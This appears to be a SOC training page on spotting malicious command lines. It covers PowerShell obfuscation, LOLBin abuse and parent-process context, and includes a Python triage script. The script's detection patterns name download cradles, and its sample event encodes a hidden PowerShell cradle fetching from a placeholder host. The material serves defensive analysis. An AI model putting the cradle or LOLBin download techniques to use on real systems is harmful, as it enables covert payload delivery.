Command line analysis

What to look for: inspection

Obfuscation covers techniques used to make code, commands, or data difficult to understand or detect; it is used both by attackers and legitimately for IP protection. PowerShell is a command-line shell and scripting language built on the .NET framework, commonly used for system administration and potentially for malicious purposes. Cobalt Strike is a legitimate post-exploitation tool widely abused for C2, lateral movement, and credential harvesting (beaconing, fileless injection, encrypted comms); pirated and cracked versions are used by APTs, ransomware gangs, and commodity malware, and it is frequently paired with TrickBot or BazarLoader to coordinate ransomware deployment. Common obfuscation patterns observed in frameworks like PowerShell Empire and Cobalt Strike:

Base64 encoding

powershell.exe -EncodedCommand <long-base64-string>

The encoded blob hides the actual command from plain-text matching.

String concatenation

cmd.exe /c "e"+"cho" "Hello"

Builds commands at runtime to evade signature matching.

Variable expansion

$env:COMSPEC

Uses environment variables to mask binary references.

Adversaries also abuse trusted system binaries, known as LOLBins (Living Off the Land Binaries): trusted, signed system binaries such as regsvr32, mshta, wmic, certutil and rundll32 that are abused for malicious execution while appearing legitimate. Typical uses are certutil.exe for downloads, regsvr32.exe for DLL execution, and bitsadmin.exe for transfers. These leave a minimal forensic footprint because the binary itself is signed and trusted.


Execution context

The same command can be benign or malicious depending on context. Four contextual signals matter most:

01 · User context

NT AUTHORITY\SYSTEM vs. a standard user account. System-level execution from a user-initiated process is rarely legitimate.

02 · Timing

Outside business hours vs. scheduled maintenance window. Cross-reference with change tickets and the user’s known patterns.

03 · Parent process

cmd.exe spawned by outlook.exe is suspicious. The same command from Task Scheduler is usually legitimate.

04 · Directory

C:\Windows\Temp or %APPDATA% is suspicious. C:\Program Files is expected.

Example: PowerShell from Outlook

A PowerShell script launched by Outlook signals likely macro execution (the attacker successfully running malicious code on a system, typically using interpreters, scripts, payloads, or legitimate tools) from an email attachment. What you would check next:

  • The Outlook session’s recent attachment activity.
  • The script’s command line (in SOC analysis, the argument string a process was launched with; often the load-bearing forensic field on an EDR alert because it reveals what the process was actually told to do) for download cradle patterns.
  • Outbound network activity from PowerShell in the next 60 seconds.
  • Whether the user’s mailbox shows similar emails to other recipients.

The same PowerShell command from Task Scheduler during a maintenance window is almost certainly legitimate. Same command, different parent, different verdict.


Pattern recognition

Build mental patterns for atypical use of common binaries. These are the shapes you want to recognize before reading the command in detail.

Unusual LOLBin invocations. rundll32.exe, mshta.exe, wmic.exe, regsvr32.exe invoked outside their normal contexts.

Framework flags. Command-line flags that suggest framework use: -NoP, -EncodedCommand, -WindowStyle Hidden, -NonInteractive.

Indirect execution. A trusted binary loading attacker-controlled content from a remote location. The binary is legitimate. The payload is not.
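The obfuscation shapes, context signals and framework flags above, folded into one triage routine as an added example (not code from this page or from any product it names). It decodes an -EncodedCommand blob, checks for the concatenation and $env: shapes, LOLBin names, an Outlook parent, staging directories and download-cradle strings; the process event is constructed for the example and the cradle points at a reserved .invalid hostname.

```python
import base64
import re

# Signals taken from the page: framework flags, LOLBins, Office parent, staging directories.
FRAMEWORK_FLAGS = ("-nop", "-encodedcommand", "-windowstyle hidden", "-noninteractive")
LOLBINS = {"rundll32.exe", "mshta.exe", "wmic.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
SUSPICIOUS_DIR = re.compile(r"\\(windows\\temp|appdata)(\\|$)", re.I)
# Obfuscation shapes from the page: quoted-fragment concatenation and $env: variable expansion.
OBFUSCATION = {"string concatenation": re.compile(r"['\"]\s*\+\s*['\"]"),
               "variable expansion": re.compile(r"\$env:\w+", re.I)}
CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I)

def decode_encoded_command(cmdline):
    """Recover the text behind -EncodedCommand (PowerShell expects base64 of UTF-16LE)."""
    m = re.search(r"-(?:encodedcommand|enc|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None  # not a valid blob; leave it for manual inspection

def triage(event):
    """Return the suspicious signals an analyst would raise for one process-creation event."""
    name = lambda p: p.rsplit("\\", 1)[-1].lower()  # strip the directory, keep the binary name
    image, parent, cl = name(event["image"]), name(event["parent_image"]), event["command_line"]
    findings = [f"framework flag {f}" for f in FRAMEWORK_FLAGS if f in cl.lower()]
    findings += [f"obfuscation: {k}" for k, rx in OBFUSCATION.items() if rx.search(cl)]
    if image in LOLBINS:
        findings.append(f"LOLBin invocation: {image}")
    if parent == "outlook.exe" and image in {"powershell.exe", "cmd.exe"}:
        findings.append("shell spawned by Outlook (likely macro execution)")
    if SUSPICIOUS_DIR.search(event["cwd"]):
        findings.append(f"staging directory: {event['cwd']}")
    decoded = decode_encoded_command(cl)
    if decoded and CRADLE.search(decoded):
        findings.append("download cradle in decoded command")
    return findings

# Constructed sample event (not from the page): the "PowerShell from Outlook" case above.
_BLOB = base64.b64encode(
    "(New-Object Net.WebClient).DownloadString('http://example.invalid/x')".encode("utf-16le")).decode()
SAMPLE_EVENT = {
    "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
    "cwd": r"C:\Users\jdoe\AppData\Roaming",
    "command_line": f"powershell.exe -NoP -WindowStyle Hidden -EncodedCommand {_BLOB}",
}
print("\n".join(triage(SAMPLE_EVENT)))
```

The same command line with a Task Scheduler parent and a Program Files working directory still raises the flag and cradle findings, which is the point of the section: flags identify the shape, context decides the verdict.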
